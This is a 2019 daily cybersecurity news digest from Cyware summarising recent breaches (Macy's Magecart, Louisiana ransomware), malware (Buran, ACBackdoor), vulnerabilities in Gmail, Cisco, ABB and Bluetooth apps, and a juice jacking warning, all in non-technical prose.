Go to listing page

Cyware Daily Threat Intelligence, November 19, 2019

Cyware Daily Threat Intelligence, November 19, 2019

Share Blog Post

In a world that's growing increasingly digital, Magecart attacks have emerged as a key cybersecurity threat to e-commerce websites. In a new breach notification, the US retail giant Macy’s has revealed that it has fallen victim to a Magecart attack on October 7, 2019. The bad actors had targeted the shopping cart features - ‘Checkout’ and ‘My Wallet’ - to collect personal and payment card details from customers.

A new backdoor malware variant for Windows and Linux has been discovered in the past 24 hours. The malware is dubbed ACBackdoor. It provides arbitrary execution of shell commands, arbitrary binary execution, and update capabilities. The malware spreads on the Windows system via the Fallout EK.

In a major security update reported in the past 24 hours, Cisco has patched a total of 19 vulnerabilities in its VoIP adapters from the SPA100 Series. The flaws could allow criminals to completely compromise the adapter’s web interface as well as the underlying operating system.

Top Breaches Reported in the Last 24 Hours

Macys.com suffers a magecart attack
Macys.com has disclosed a magecart attack that occurred early last month. The attackers managed to inject malicious script into ‘Checkout’ and ‘My Wallet’ pages of the site to steal shoppers’ personal information and credit card details. The company detected the hack on October 15, 2019.

UNC School reports a breach
UNC-Chapel Hill School of Medicine has disclosed a potential data breach that took place in mid-2018. The incident affected the protected health information of about 3,716 patients for about a month. The compromised data included names, birth dates, demographic details, contact information, health insurance information, and credit card details.

Louisiana government attacked
Louisiana state government computers have suffered a ransomware attack. This has knocked down the servers and computers of many state agencies. The government is working on restoring the systems as early as possible.

Liver Wellness targeted in phishing
Liver Wellness, a medical testing company in Dublin, has suffered a phishing attack after hackers accessed the company’s email system and used it to send phishing messages to patients. It is still unclear as to how the attackers managed to gain unauthorized access to the email account.

Top Malware Reported in the Last 24 Hours

Buran ransomware returns
A new spam campaign that distributes the Buran ransomware has been spotted recently. The ransomware spreads through IQY file attachments. When opened, these Microsoft Excel Web Query attachments execute a remote command that installs the ransomware onto a victim’s computer. The spoofed email pretends to be a simple forward of a previous email stating that the user should ‘Print document in attach’.

ACBackdoor malware
Researchers have discovered a new multi-platform backdoor that infects Windows and Linux systems. The malware dubbed ACBackdoor provides arbitrary execution of shell commands, arbitrary binary execution, and update capabilities. The Windows version is pushed through malvertising with the help of the Fallout exploit kit. However, it is unknown as to how the malware is dropped on Linux systems.

Top Vulnerabilities Reported in the Last 24 Hours

Google addresses an XSS flaw
Google has fixed an XSS vulnerability that resides in the AMP4Email feature in Gmail. AMP4Email was rolled out this July to make it easier for dynamic content to show up in emails such as comment threads or event invitations.

Vulnerable WHfB
Lack of official documents related to Windows Hello for Business (WHfB) has caused researchers to explore an Active Directory backdoor and three other attack vectors that could lead to privilege escalation. One of these attack vectors has already been fixed and the other two are currently under review.

Faulty VoIP adapters
A total of 19 vulnerabilities have been detected in VoIP adapters from Cisco’s SPA100 Series. If exploited, these vulnerabilities could allow an attacker to eavesdrop on a user’s conversation, initiate fraudulent phone calls and even pivot further into their internal networks. Cisco has addressed these flaws with a new 1.4.1 SR5 firmware release for their SPA 100 series devices. 

Flawed ABB products
The CISA has informed the existence of an authenticated bypass vulnerability affecting ABB’s Power Generation Information Manager (PGIM) plant historian and data analysis tool. The flaw also affects Plant Connect. The affected products are used worldwide in a wide range of sectors including dams, critical manufacturing, energy, water and wastewater, food and agriculture and chemical industry. The flaw is tracked as CVE-2019-18250.

Vulnerable Bluetooth devices
Mobile apps that work through Bluetooth have an inherent design flaw that makes them vulnerable to hacking. The problems lie in the way Bluetooth Low Energy devices communicate with mobile apps such as fitness trackers, smart thermostats, smart speaker or smart home assistants. The apps communicate by broadcasting UUID, which is unique to a user’s device and is also used to recognize Bluetooth-enabled devices. This UUID can make the devices vulnerable to a fingerprint attack.

Top Scams Reported in the Last 24 Hours

Juice Jacking scam
Los Angeles County District Attorney’s Office has released a warning against juice jacking scam. Travelers have been advised to avoid using pubic charging outlets for their electronic devices as the ports may contain malware. Criminals load malware onto charging stations or cables to infect the phones and other electronic devices of unsuspecting users. This could allow attackers to drain bank account details from the infected user’s phone. To prevent falling to such scams, travelers should bring their own charging cord and adapter base.


voip adapters
xss vulnerability
juice jacking scam
windows hello for business

Posted on: November 19, 2019

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.